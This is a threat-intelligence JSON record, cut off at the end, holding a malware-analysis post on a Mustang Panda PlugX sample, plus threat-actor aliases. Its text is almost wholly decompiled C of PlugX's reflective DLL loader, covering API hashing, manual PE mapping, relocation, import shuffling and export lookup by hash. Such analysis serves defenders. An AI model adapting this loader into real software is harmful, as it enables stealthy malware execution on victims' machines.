{
	"id": "1acb4943-eb65-48ec-9906-fb5befc3dbd1",
	"created_at": "2026-04-06T00:09:33.031264Z",
	"updated_at": "2026-04-10T03:36:33.385813Z",
	"deleted_at": null,
	"sha1_hash": "a0002020dd5651bfeb5f8d3092a81eb2d6df39c2",
	"title": "Diving into a PlugX sample of Mustang Panda group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 371970,
	"plain_text": "Diving into a PlugX sample of Mustang Panda group\r\nPublished: 2022-12-27 · Archived: 2026-04-05 22:56:51 UTC\r\nint __cdecl plx_dll_loader( int pPlugxDllBaseAddr, _DWORD *pre_exportFuncHash, int\r\nexport_arg1, int export_arg2, int export_arg3, unsigned int dwFlag)\r\n{\r\nwstr_kernel32_dll[0] = 'k' ;\r\nwstr_kernel32_dll[1] = 'e' ;\r\nwstr_kernel32_dll[4] = 'e' ;\r\nwstr_kernel32_dll[6] = '3' ;\r\nwstr_kernel32_dll[7] = '2' ;\r\nwstr_kernel32_dll[8] = '.' ;\r\nLoadLibraryA = 0;\r\nVirtualAlloc = 0;\r\nFlushInstructionCache = 0;\r\nGetNativeSystemInfo = 0;\r\nVirtualProtect = 0;\r\nSleep = 0;\r\nRtlAddFunctionTable = 0;\r\nwstr_kernel32_dll[2] = 'r' ;\r\nwstr_kernel32_dll[3] = 'n' ;\r\nwstr_kernel32_dll[5] = 'l' ;\r\nwstr_kernel32_dll[9] = 'd' ;\r\nwstr_kernel32_dll[0xA] = 'l' ;\r\nwstr_kernel32_dll[0xB] = 'l' ;\r\nqmemcpy(\u0026apiFuncs, \"Sleep\" , 5);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 1 of 22\n\nqmemcpy(apiFuncs.wstr_LoadLibraryA, \"LoadLibraryAVirtualProtect\" , 0x1A);\r\nqmemcpy(apiFuncs.wstr_VirtualAlloc, \"VirtualAlloc\" , sizeof (apiFuncs.wstr_VirtualAlloc));\r\nqmemcpy(wstr_FlushInstructionCache, \"FlushInstructionCache\" ,\r\nsizeof (wstr_FlushInstructionCache));\r\nqmemcpy(\u0026wstr_GetNativeSystemInfo[1], \"etNativeSystemInfo\" , 0x12);\r\nstr_RtlAddFunctionTable[0x12] = 0x65;\r\nwstr_GetNativeSystemInfo[0] = 0x47;\r\nqmemcpy(str_RtlAddFunctionTable, \"RtlAddFunctionTabl\" , 0x12);\r\nLdrLoadDll = plx_retrieve_api_from_hash(0xBDBF9C13);\r\nLdrGetProcedureAddress = plx_retrieve_api_from_hash(0x5ED941B5u);\r\nmoduleInfo.Buffer = wstr_kernel32_dll;\r\nmoduleInfo.MaximumLength = 0x18;\r\nmoduleInfo.Length = 0x18;\r\ntmp_var.LdrGetProcedureAddress = LdrGetProcedureAddress;\r\nLdrLoadDll(0, 0, \u0026moduleInfo, \u0026dllHandle);\r\napiName.Length = 12;\r\napiName.Buffer = apiFuncs.wstr_VirtualAlloc;\r\napiName.MaximumLength = 
12;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026VirtualAlloc);\r\napiName.Length = 14;\r\napiName.MaximumLength = 14;\r\napiName.Buffer = apiFuncs.wstr_VirtualProtect;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026VirtualProtect);\r\napiName.Length = 21;\r\napiName.MaximumLength = 21;\r\napiName.Buffer = wstr_FlushInstructionCache;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026FlushInstructionCache);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 2 of 22\n\napiName.Length = 0x13;\r\napiName.Buffer = wstr_GetNativeSystemInfo;\r\napiName.MaximumLength = 0x13;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026GetNativeSystemInfo);\r\napiName.Length = 5;\r\napiName.MaximumLength = 5;\r\napiName.Buffer = \u0026apiFuncs;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026Sleep);\r\napiName.Length = 0x13;\r\napiName.Buffer = str_RtlAddFunctionTable;\r\napiName.MaximumLength = 0x13;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026RtlAddFunctionTable);\r\napiName.Length = 12;\r\napiName.Buffer = apiFuncs.wstr_LoadLibraryA;\r\napiName.MaximumLength = 12;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026LoadLibraryA);\r\nif ( !VirtualAlloc )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !VirtualProtect )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !Sleep )\r\n{\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 3 of 22\n\nreturn FALSE;\r\n}\r\nif ( !FlushInstructionCache )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !GetNativeSystemInfo )\r\n{\r\nreturn FALSE;\r\n}\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\npPlugxDllNtHeaders = (pPlugxDllBaseAddr + *(pPlugxDllBaseAddr + offsetof(IMAGE_DOS_HEADER,\r\ne_lfanew)));\r\nif ( pPlugxDllNtHeaders-\u003eSignature != IMAGE_NT_SIGNATURE 
)\r\n{\r\nreturn FALSE;\r\n}\r\nif ( pPlugxDllNtHeaders-\u003eFileHeader.Machine != IMAGE_FILE_MACHINE_I386 )\r\n{\r\nreturn FALSE;\r\n}\r\nplxHeaderInfo.SectionAlignment = pPlugxDllNtHeaders-\u003eOptionalHeader.SectionAlignment;\r\nif ( plxHeaderInfo.SectionAlignment \u0026 1 )\r\n{\r\nreturn FALSE;\r\n}\r\ntotal_section_size = 0;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 4 of 22\n\nnum_of_sections = pPlugxDllNtHeaders-\u003eFileHeader.NumberOfSections;\r\nif ( pPlugxDllNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxSectionHeaders = (\u0026pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfUninitializedData +\r\npPlugxDllNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\nif ( ADJ(pPlugxSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\nplxHeaderInfo.SizeOfRawData = ADJ(pPlugxSectionHeaders)-\u003eSizeOfRawData;\r\n}\r\nsection_size = ADJ(pPlugxSectionHeaders)-\u003eVirtualAddress + plxHeaderInfo.SizeOfRawData;\r\nif ( section_size \u003c= total_section_size )\r\n{\r\nsection_size = total_section_size;\r\n}\r\npPlugxSectionHeaders += 0xA;\r\ntotal_section_size = section_size;\r\nplxHeaderInfo.SectionAlignment = pPlugxDllNtHeaders-\u003eOptionalHeader.SectionAlignment;\r\n--num_of_sections;\r\n}\r\nwhile ( num_of_sections );\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\n}\r\nGetNativeSystemInfo(\u0026system_info);\r\nv15 = ~(system_info.dwPageSize - 1);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 5 of 22\n\nplx_dllSizeOfImage = v15 \u0026 (pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfImage +\r\nsystem_info.dwPageSize - 1);\r\nif ( plx_dllSizeOfImage != (v15 \u0026 (total_section_size + system_info.dwPageSize - 1)) )\r\n{\r\nreturn FALSE;\r\n}\r\npPlugxNewBaseAddr = VirtualAlloc(pPlugxDllNtHeaders-\u003eOptionalHeader.ImageBase,\r\nplx_dllSizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);\r\nif ( !pPlugxNewBaseAddr 
)\r\n{\r\npPlugxNewBaseAddr = VirtualAlloc(0, plx_dllSizeOfImage, MEM_RESERVE|MEM_COMMIT,\r\nPAGE_READWRITE);\r\n}\r\nif ( dwFlag \u0026 1 )\r\n{\r\n*(pPlugxNewBaseAddr + offsetof(IMAGE_DOS_HEADER, e_lfanew)) = *(cp_pPlugxDllBaseAddr +\r\noffsetof(IMAGE_DOS_HEADER, e_lfanew));\r\noffset_from_e_lfanew = *(cp_pPlugxDllBaseAddr + offsetof(IMAGE_DOS_HEADER, e_lfanew));\r\nif ( offset_from_e_lfanew \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders )\r\n{\r\npPlugxNewNtHeaders = (pPlugxNewBaseAddr + offset_from_e_lfanew);\r\ndo\r\n{\r\n++offset_from_e_lfanew;\r\nLOBYTE(pPlugxNewNtHeaders-\u003eSignature) = *(\u0026pPlugxNewNtHeaders-\u003eSignature +\r\ncp_pPlugxDllBaseAddr - pPlugxNewBaseAddr);\r\npPlugxNewNtHeaders = (pPlugxNewNtHeaders + 1);\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 6 of 22\n\nwhile ( offset_from_e_lfanew \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders );\r\n}\r\n}\r\nelse                                          \r\n{\r\nfor ( cnt = 0; cnt \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders; ++pPlugxNewBaseAddr )\r\n{\r\n++cnt;\r\n*pPlugxNewBaseAddr = *(pPlugxNewBaseAddr + cp_pPlugxDllBaseAddr - pPlugxNewBaseAddr);\r\n}\r\n}\r\nnTotalSectionCopied = 0;\r\npPlugxNewNtHeaders = (pPlugxNewBaseAddr + *(pPlugxNewBaseAddr + offsetof(IMAGE_DOS_HEADER,\r\ne_lfanew)));\r\ntmp_var2.nTotalSectionCopied = 0;\r\nif ( pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxNewSectionHeaders = (\u0026pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint +\r\npPlugxNewNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\ncnt = 0;\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\ndo\r\n{\r\n*(pPlugxNewBaseAddr + ADJ(pPlugxNewSectionHeaders)-\u003eVirtualAddress + cnt) = *(cnt\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 7 of 
22\n\n+\r\nADJ(pPlugxNewSectionHeaders)-\u003ePointerToRawData\r\n+\r\ncp_pPlugxDllBaseAddr);\r\n++cnt;\r\n}\r\nwhile ( cnt \u003c ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData );\r\nnTotalSectionCopied = tmp_var2.nTotalSectionCopied;\r\n}\r\nNumberOfSections = pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections;\r\n++nTotalSectionCopied;\r\npPlugxNewSectionHeaders += 0xA;\r\ntmp_var2.nTotalSectionCopied = nTotalSectionCopied;\r\n}\r\nwhile ( nTotalSectionCopied \u003c NumberOfSections );\r\n}\r\ndelta_offset = pPlugxNewBaseAddr - pPlugxNewNtHeaders-\u003eOptionalHeader.ImageBase;\r\ndelta_offset = pPlugxNewBaseAddr - pPlugxNewNtHeaders-\u003eOptionalHeader.ImageBase;\r\nif ( delta_offset )\r\n{\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[5].Size )\r\n{\r\nrelocation = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[5].VirtualAddress);\r\nif ( relocation-\u003eVirtualAddress )\r\n{\r\nv29 = delta_offset;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 8 of 22\n\nwhile ( 1 )\r\n{\r\nfor ( ++relocation; relocation != (relocation + relocation-\u003eSizeOfBlock); relocation =\r\n(relocation + 2) )\r\n{\r\nv31 = relocation-\u003eVirtualAddress;\r\nrel_type = LOWORD(relocation-\u003eVirtualAddress) \u003e\u003e 0xC;\r\nswitch ( rel_type )\r\n{\r\ncase IMAGE_DEBUG_TYPE_OMAP_FROM_SRC|IMAGE_DEBUG_TYPE_CODEVIEW:\r\nv33 = relocation-\u003eVirtualAddress;\r\ndelta_offset = relocation-\u003eVirtualAddress \u0026 0xFFF;\r\n*(v33 + pPlugxNewBaseAddr + delta_offset) += v29;\r\ncontinue ;\r\ncase IMAGE_REL_BASED_HIGHLOW:\r\n*(pPlugxNewBaseAddr + (v31 \u0026 0xFFF) + relocation-\u003eVirtualAddress) += v29;\r\ncontinue ;\r\ncase IMAGE_REL_ALPHA_REFLONG:\r\nv34 = v29 \u003e\u003e 0x10;\r\nbreak ;\r\ncase IMAGE_REL_PPC_ADDR32:\r\nv34 = v29;\r\nbreak ;\r\ndefault :\r\ncontinue ;\r\n}\r\n*(pPlugxNewBaseAddr + (v31 \u0026 0xFFF) + relocation-\u003eVirtualAddress) += 
v34;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 9 of 22\n\n}\r\nif ( !relocation-\u003eVirtualAddress )\r\n{\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\nbreak ;\r\n}\r\n}\r\n}\r\n}\r\n}\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].Size )\r\n{\r\nimportTblRVA = pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].VirtualAddress;\r\nnImportedDll = 0;\r\ncp_nDllImported = 0;\r\npPlugXNewImportDesc = (importTblRVA + pPlugxNewBaseAddr);\r\npNameRVA = (importTblRVA + pPlugxNewBaseAddr + offsetof(IMAGE_IMPORT_DESCRIPTOR, Name));\r\ntmp_var_1.pPlugXNewImportDesc = (importTblRVA + pPlugxNewBaseAddr);\r\nif ( ADJ(pNameRVA)-\u003eName )\r\n{\r\ndo\r\n{\r\npNameRVA += 5;\r\n++nImportedDll;\r\n}\r\nwhile ( ADJ(pNameRVA)-\u003eName );\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 10 of 22\n\ncp_nDllImported = nImportedDll;\r\n}\r\ndelta_offset = 0;\r\nv102 = dwFlag \u0026 4;\r\nimportTblRVA_ = importTblRVA;\r\nif ( dwFlag \u0026 4 \u0026\u0026 nImportedDll \u003e 1 )\r\n{\r\ntmp_var2.pPlugXNewImportDesc = 0;\r\ndelta_offset = dwFlag \u003e\u003e 0x10;\r\nnDll = nImportedDll - 1;\r\ni = 0;\r\npPlugXNewImportDesc_ = (importTblRVA + pPlugxNewBaseAddr);\r\ndo\r\n{\r\npPlugxDllBaseAddra = 0x343FD * cp_pPlugxDllBaseAddr + 0x269EC3;\r\nv42 = \u0026pPlugXNewImportDesc[i + (HIWORD(pPlugxDllBaseAddra) \u0026 0x7FFFu) / (0x7FFF /\r\n(nImportedDll - i) + 1)];\r\n++i;\r\nqmemcpy(v109, v42, sizeof (v109));\r\nv43 = v42;\r\nnImportedDll = cp_nDllImported;\r\nqmemcpy(v43, pPlugXNewImportDesc_, sizeof (IMAGE_IMPORT_DESCRIPTOR));\r\nqmemcpy(pPlugXNewImportDesc_, v109, sizeof (IMAGE_IMPORT_DESCRIPTOR));\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddra;\r\n++pPlugXNewImportDesc_;\r\npPlugXNewImportDesc = tmp_var_1.pPlugXNewImportDesc;\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 11 of 
22\n\nwhile ( i \u003c nDll );\r\nimportTblRVA_ = pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].VirtualAddress;\r\n}\r\ntmp_var2.pPlugXNewImportDesc = (importTblRVA_ + pPlugxNewBaseAddr);\r\ndllNameRVA = *(importTblRVA_ + pPlugxNewBaseAddr + offsetof(IMAGE_IMPORT_DESCRIPTOR, Name));\r\nif ( dllNameRVA )\r\n{\r\npPlugXNewImportDesc = tmp_var2.pPlugXNewImportDesc;\r\ndo\r\n{\r\nmodule_handle = LoadLibraryA((pPlugxNewBaseAddr + dllNameRVA));\r\ndllHandle.module_handle = module_handle;\r\nthunkRef = (pPlugxNewBaseAddr + pPlugXNewImportDesc-\u003eOriginalFirstThunk);\r\nfuncRef = (pPlugxNewBaseAddr + pPlugXNewImportDesc-\u003eFirstThunk);\r\nthunkRefInfo = thunkRef-\u003eu1.AddressOfData;\r\nif ( thunkRef-\u003eu1.AddressOfData )\r\n{\r\nLdrGetProcedureAddress = tmp_var.LdrGetProcedureAddress;\r\nwhile ( TRUE )\r\n{\r\nif ( thunkRefInfo \u003e= 0 )\r\n{\r\nlen_str_apiName = 0;\r\nstr_apiName = \u0026thunkRefInfo-\u003eName[pPlugxNewBaseAddr];\r\ntmp_var_1.str_apiName = str_apiName;\r\nif ( *str_apiName )\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 12 of 22\n\n{\r\ndo\r\n{\r\n++len_str_apiName;\r\n++str_apiName;\r\n}\r\nwhile ( *str_apiName );\r\nstr_apiName = tmp_var_1.str_apiName;\r\n}\r\napiName.Length = len_str_apiName;\r\napiName.MaximumLength = len_str_apiName;\r\napiName.Buffer = str_apiName;\r\nLdrGetProcedureAddress(module_handle, \u0026apiName, 0, \u0026funcRef-\u003eu1.Function);\r\n}\r\nelse\r\n{\r\nLdrGetProcedureAddress(module_handle, 0, LOWORD(thunkRef-\u003eu1.AddressOfData),\r\n\u0026funcRef-\u003eu1.Function);\r\n}\r\n++thunkRef;\r\n++funcRef;\r\nthunkRefInfo = thunkRef-\u003eu1.AddressOfData;\r\nif ( !thunkRef-\u003eu1.AddressOfData )\r\n{\r\nbreak ;\r\n}\r\nmodule_handle = dllHandle.module_handle;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 13 of 22\n\n}\r\npPlugXNewImportDesc = 
tmp_var2.pPlugXNewImportDesc;\r\n}\r\nif ( delta_offset \u0026\u0026 v102 \u0026\u0026 cp_nDllImported \u003e 1 )\r\n{\r\nSleep(0x3E8 * delta_offset);\r\n}\r\ndllNameRVA = pPlugXNewImportDesc[1].Name;\r\n++pPlugXNewImportDesc;\r\ntmp_var2.pPlugXNewImportDesc = pPlugXNewImportDesc;\r\n}\r\nwhile ( dllNameRVA );\r\n}\r\n}\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[0xD].Size )\r\n{\r\npDelayLoadDesc = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[0xD].VirtualAddress + 4);\r\ntmp_var2.pdelayImportDesc = pDelayLoadDesc;\r\nDllNameRVA = ADJ(pDelayLoadDesc)-\u003eDllNameRVA;\r\nif ( DllNameRVA )\r\n{\r\nv56 = \u0026ADJ(tmp_var2.pdelayImportDesc)-\u003eDllNameRVA;\r\ndo\r\n{\r\nmodule_handle = LoadLibraryA((pPlugxNewBaseAddr + DllNameRVA));\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 14 of 22\n\ndllHandle.module_handle = module_handle;\r\nImportAddressTableRVA = (pPlugxNewBaseAddr + ADJ(v56)-\u003eImportAddressTableRVA);\r\nImportNameTableRVA = (pPlugxNewBaseAddr + ADJ(v56)-\u003eImportNameTableRVA);\r\nif ( ImportAddressTableRVA-\u003eu1.AddressOfData )\r\n{\r\nLdrGetProcedureAddress = tmp_var.LdrGetProcedureAddress;\r\nwhile ( TRUE )\r\n{\r\nImportNameRVA = ImportNameTableRVA-\u003eu1.AddressOfData;\r\nif ( (ImportNameTableRVA-\u003eu1.AddressOfData \u0026 0x80000000) == 0 )\r\n{\r\nlen_str_delayAPIName = 0;\r\nstr_delayAPIName = \u0026ImportNameRVA-\u003eName[pPlugxNewBaseAddr];\r\nv102 = str_delayAPIName;\r\nif ( *str_delayAPIName )\r\n{\r\ndo\r\n{\r\n++len_str_delayAPIName;\r\n++str_delayAPIName;\r\n}\r\nwhile ( *str_delayAPIName );\r\nstr_delayAPIName = v102;\r\n}\r\napiName.Length = len_str_delayAPIName;\r\napiName.MaximumLength = len_str_delayAPIName;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 15 of 22\n\napiName.Buffer = 
str_delayAPIName;\r\nLdrGetProcedureAddress(module_handle, \u0026apiName, 0, \u0026ImportAddressTableRVA-\r\n\u003eu1.Function);\r\n}\r\nelse\r\n{\r\nLdrGetProcedureAddress(module_handle, 0, ImportNameRVA, \u0026ImportAddressTableRVA-\r\n\u003eu1.AddressOfData);\r\n}\r\n++ImportAddressTableRVA;\r\n++ImportNameTableRVA;\r\nif ( !ImportAddressTableRVA-\u003eu1.Function )\r\n{\r\nbreak ;\r\n}\r\nmodule_handle = dllHandle.module_handle;\r\n}\r\nv56 = \u0026ADJ(tmp_var2.pdelayImportDesc)-\u003eDllNameRVA;\r\n}\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\nv56 += 8;\r\ntmp_var2.pdelayImportDesc = v56;\r\nDllNameRVA = ADJ(v56)-\u003eDllNameRVA;\r\n}\r\nwhile ( ADJ(v56)-\u003eDllNameRVA );\r\n}\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 16 of 22\n\ncnt = 0;\r\nif ( pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxNewSectionHeaders = (\u0026pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint +\r\npPlugxNewNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\nsectionCharacteristics = ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics;\r\nsection_can_read = ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics \u0026 IMAGE_SCN_MEM_READ;\r\nif ( sectionCharacteristics \u0026 IMAGE_SCN_MEM_EXECUTE )\r\n{\r\nif ( section_can_read )\r\n{\r\nflNewProtect = IMAGE_SCN_CNT_INITIALIZED_DATA;\r\n}\r\nelse\r\n{\r\nflNewProtect = IMAGE_SCN_CNT_UNINITIALIZED_DATA;\r\npage_Protection = 0x10;\r\n}\r\nif ( sectionCharacteristics \u003e= 0 )\r\n{\r\nflNewProtect = page_Protection;\r\n}\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 17 of 22\n\nelse\r\n{\r\nif ( section_can_read )\r\n{\r\nflNewProtect = 4;\r\npage_protection = 2;\r\n}\r\nelse\r\n{\r\nflNewProtect = IMAGE_SCN_TYPE_NO_PAD;\r\npage_protection = PAGE_NOACCESS;\r\n}\r\nif ( sectionCharacteristics \u003e= 
0 )\r\n{\r\nflNewProtect = page_protection;\r\n}\r\n}\r\nflOldProtect = flNewProtect;\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics \u0026 IMAGE_SCN_MEM_NOT_CACHED )\r\n{\r\nflNewProtect |= IMAGE_SCN_LNK_INFO;\r\nflOldProtect = flNewProtect;\r\n}\r\nVirtualProtect(\r\n(pPlugxNewBaseAddr + ADJ(pPlugxNewSectionHeaders)-\u003eVirtualAddress),\r\nADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData,\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 18 of 22\n\nflNewProtect,\r\n\u0026flOldProtect);\r\n}\r\n++cnt;\r\npPlugxNewSectionHeaders += 0xA;\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\n}\r\nwhile ( cnt \u003c pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections );\r\n}\r\nFlushInstructionCache(0xFFFFFFFF, 0, 0);\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[9].Size )\r\n{\r\ntlsDir = *(pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[9].VirtualAddress +\r\npPlugxNewBaseAddr + 0xC);\r\nfor ( tlsCallBackFunc = ADJ(tlsDir)-\u003eAddressOfCallBacks; ADJ(tlsDir)-\u003eAddressOfCallBacks;\r\ntlsCallBackFunc = ADJ(tlsDir)-\u003eAddressOfCallBacks )\r\n{\r\ntlsCallBackFunc(pPlugxNewBaseAddr, 1, 0);\r\n++tlsDir;\r\n}\r\n}\r\n((pPlugxNewBaseAddr + pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint))(pPlugxNewBaseAddr,\r\n1, 0);\r\nif ( !pre_exportFuncHash )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 19 of 22\n\nif ( !pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[0].Size )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nexportDirRVA = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[offsetof(IMAGE_NT_HEADERS, Signature)].VirtualAddress);\r\nnumExportedNames = exportDirRVA-\u003eNumberOfNames;\r\nif ( !numExportedNames )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nif ( !exportDirRVA-\u003eNumberOfFunctions )\r\n{\r\nreturn 
pPlugxNewBaseAddr;\r\n}\r\nAddressOfNameOrdinalsRVA = exportDirRVA-\u003eAddressOfNameOrdinals;\r\npNameAddressTbl = (pPlugxNewBaseAddr + exportDirRVA-\u003eAddressOfNames);\r\ntmp_var.dwExportHash = 0;\r\npOrdinalsTbl = (pPlugxNewBaseAddr + AddressOfNameOrdinalsRVA);\r\ndo\r\n{\r\nexportNameRVA = *pNameAddressTbl;\r\ntmp_var2.cnt = 0;\r\nstr_exported_func = (pPlugxNewBaseAddr + exportNameRVA);\r\nif ( !str_exported_func )\r\n{\r\nbreak ;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 20 of 22\n\n}\r\nchr = *str_exported_func;\r\nif ( *str_exported_func )\r\n{\r\ndwExportHash = tmp_var2.dwExportHash;\r\ndo\r\n{\r\ndwExportHash = __ROR4__(chr + dwExportHash, 0xD);\r\nchr = *++str_exported_func;\r\n}\r\nwhile ( *str_exported_func );\r\ntmp_var2.dwExportHash = dwExportHash;\r\nnumExportedNames = exportDirRVA-\u003eNumberOfNames;\r\nif ( pre_exportFuncHash == dwExportHash )\r\n{\r\nif ( pOrdinalsTbl )\r\n{\r\nexportFunc = (pPlugxNewBaseAddr + *(exportDirRVA-\u003eAddressOfFunctions + 4 * *pOrdinalsTbl\r\n+ pPlugxNewBaseAddr));\r\nif ( dwFlag \u0026 8 )\r\n{\r\nexportFunc(export_arg3, 4);\r\n}\r\nelse\r\n{\r\nexportFunc(export_arg1, export_arg2);\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 21 of 22\n\nreturn pPlugxNewBaseAddr;\r\n}\r\n}\r\n}\r\n++pNameAddressTbl;\r\n++pOrdinalsTbl;\r\n++tmp_var.cnt;\r\n}\r\nwhile ( tmp_var.cnt \u003c numExportedNames );\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nSource: https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/"
	],
	"report_names": [
		"diving-into-a-plugx-sample-of-mustang-panda-group"
	],
	"threat_actors": [
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta",
				"HoneyMyte",
				"Mustang Panda",
				"Red Delta",
				"Red Lich",
				"Stately Taurus",
				"TA416",
				"Temp.Hex",
				"Twill Typhoon"
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
